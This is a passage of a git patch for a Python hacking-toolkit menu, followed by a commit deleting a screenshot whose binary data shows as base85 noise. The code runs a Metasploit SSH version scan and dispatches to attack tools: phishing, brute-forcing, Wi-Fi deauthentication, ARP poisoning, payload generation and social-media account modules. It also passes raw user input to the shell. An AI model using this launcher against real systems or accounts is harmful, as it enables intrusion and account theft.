") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + found = True +mainbanner() +main() From 181c469f050c889cff6478ee113dc3cf94fc437c Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 20:36:12 +0100 Subject: [PATCH 033/214] Delete screenshot.png --- tools/screenshot.png | Bin 44166 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 tools/screenshot.png diff --git a/tools/screenshot.png b/tools/screenshot.png deleted file mode 100644 index 7b3ab7112fc5ebdf07d127fc09763422ae494fa2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 44166 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

eaf#%MxzpfPJ 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 